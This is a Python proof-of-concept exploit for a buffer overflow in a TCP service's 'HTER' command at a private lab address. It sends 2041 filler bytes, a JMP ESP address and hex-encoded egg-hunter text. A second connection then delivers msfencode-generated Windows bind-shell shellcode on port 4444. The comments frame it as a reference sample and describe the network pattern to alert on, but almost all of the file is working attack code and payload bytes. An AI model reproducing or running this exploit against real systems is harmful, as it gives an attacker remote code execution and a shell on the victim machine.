#!/usr/bin/python
# Proof-of-concept client for a TCP service on host:port (below). It opens
# two sequential connections: the first sends one long "HTER " request, the
# second sends "HTER T00WT00W" followed by an msfencode-produced payload
# (per the comment on buf2). Kept as a reference sample. On the wire this
# looks like two short-lived TCP connections to the same port, the first
# carrying an oversized "HTER " command (2041 'A's plus hex text); that
# pattern is the thing to alert on.
import socket
import os
import sys
import time

# Target endpoint, hard-coded. 172.16.0.0/12 is a private (RFC 1918) range.
host="172.16.155.133"
port=9999

# Payload bytes as emitted by the command in the comment below; the -b
# argument lists the bytes the encoder was told to avoid (\x00\x0a\x0d\x20).
# msfpayload windows/shell_bind_tcp lport=4444 R | msfencode -b '\x00\x0a\x0d\x20' -t c
buf2=("\xdd\xc4\xb8\x54\x91\x67\x9c\xd9\x74\x24\xf4\x5b\x33\xc9\xb1"
"\x56\x31\x43\x18\x83\xeb\xfc\x03\x43\x40\x73\x92\x60\x80\xfa"
"\x5d\x99\x50\x9d\xd4\x7c\x61\x8f\x83\xf5\xd3\x1f\xc7\x58\xdf"
"\xd4\x85\x48\x54\x98\x01\x7e\xdd\x17\x74\xb1\xde\x99\xb8\x1d"
"\x1c\xbb\x44\x5c\x70\x1b\x74\xaf\x85\x5a\xb1\xd2\x65\x0e\x6a"
"\x98\xd7\xbf\x1f\xdc\xeb\xbe\xcf\x6a\x53\xb9\x6a\xac\x27\x73"
"\x74\xfd\x97\x08\x3e\xe5\x9c\x57\x9f\x14\x71\x84\xe3\x5f\xfe"
"\x7f\x97\x61\xd6\xb1\x58\x50\x16\x1d\x67\x5c\x9b\x5f\xaf\x5b"
"\x43\x2a\xdb\x9f\xfe\x2d\x18\xdd\x24\xbb\xbd\x45\xaf\x1b\x66"
"\x77\x7c\xfd\xed\x7b\xc9\x89\xaa\x9f\xcc\x5e\xc1\xa4\x45\x61"
"\x06\x2d\x1d\x46\x82\x75\xc6\xe7\x93\xd3\xa9\x18\xc3\xbc\x16"
"\xbd\x8f\x2f\x43\xc7\xcd\x27\xa0\xfa\xed\xb7\xae\x8d\x9e\x85"
"\x71\x26\x09\xa6\xfa\xe0\xce\xc9\xd1\x55\x40\x34\xd9\xa5\x48"
"\xf3\x8d\xf5\xe2\xd2\xad\x9d\xf2\xdb\x78\x31\xa3\x73\xd2\xf2"
"\x13\x34\x82\x9a\x79\xbb\xfd\xbb\x81\x11\x88\xfb\x4f\x41\xd9"
"\x6b\xb2\x75\xcc\x37\x3b\x93\x84\xd7\x6d\x0b\x30\x1a\x4a\x84"
"\xa7\x65\xb8\xb8\x70\xf2\xf4\xd6\x46\xfd\x04\xfd\xe5\x52\xac"
"\x96\x7d\xb9\x69\x86\x82\x94\xd9\xc1\xbb\x7f\x93\xbf\x0e\xe1"
"\xa4\x95\xf8\x82\x37\x72\xf8\xcd\x2b\x2d\xaf\x9a\x9a\x24\x25"
"\x37\x84\x9e\x5b\xca\x50\xd8\xdf\x11\xa1\xe7\xde\xd4\x9d\xc3"
"\xf0\x20\x1d\x48\xa4\xfc\x48\x06\x12\xbb\x22\xe8\xcc\x15\x98"
"\xa2\x98\xe0\xd2\x74\xde\xec\x3e\x03\x3e\x5c\x97\x52\x41\x51"
"\x7f\x53\x3a\x8f\x1f\x9c\x91\x0b\x2f\xd7\xbb\x3a\xb8\xbe\x2e"
"\x7f\xa5\x40\x85\xbc\xd0\xc2\x2f\x3d\x27\xda\x5a\x38\x63\x5c"
"\xb7\x30\xfc\x09\xb7\xe7\xfd\x1b")

# Every byte value 0x01..0xff in order (the classic bad-character probe).
# It is referenced only in the commented-out tail of `junk`, so it is unused
# at runtime.
badchars=(
"\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10"
"\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20"
"\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30"
"\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40"
"\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50"
"\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f\x60"
"\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70"
"\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80"
"\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90"
"\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0"
"\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0"
"\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0"
"\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0"
"\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0"
"\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0"
"\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff")

# Hex text appended to the first request. The name and the "T00WT00W" tag
# sent on the second connection suggest an egg-hunter stub, but that cannot
# be verified from this file alone.
egg = "6681caff0f42526a0258cd2e3c055a74efb8543030578bfaaf75eaaf75e7ffe7"

# First request body: "HTER " + 2041 'A's + "e7e6d377" (the 77D3E6E7 address
# noted below, byte-reversed and written as hex text) + the text
# "9090909090" + egg. Everything after the 'A's is sent as ASCII hex, not
# raw bytes; presumably the service decodes hex input itself — TODO confirm.
# The trailing comment shows `badchars` was once appended here.
#77D3E6E7 JMP ESP
junk = "HTER " + "A"*(2041) + "e7e6d377" + "9090909090" + egg #+ "T00WT00W" + badchars

# Connection 1: send the long request and close. Nothing is read back and
# no exception is handled; a refused connection raises socket.error.
expl = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
expl.connect((host, port))
expl.send(junk)
expl.close()

# Fixed one-second gap between the two connections.
time.sleep(1)

# Connection 2: the "T00WT00W" tag followed by the raw payload bytes.
# `os` and `sys` are imported above but never used.
expl = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
expl.connect((host, port))
expl.send("HTER T00WT00W"+buf2)
expl.close()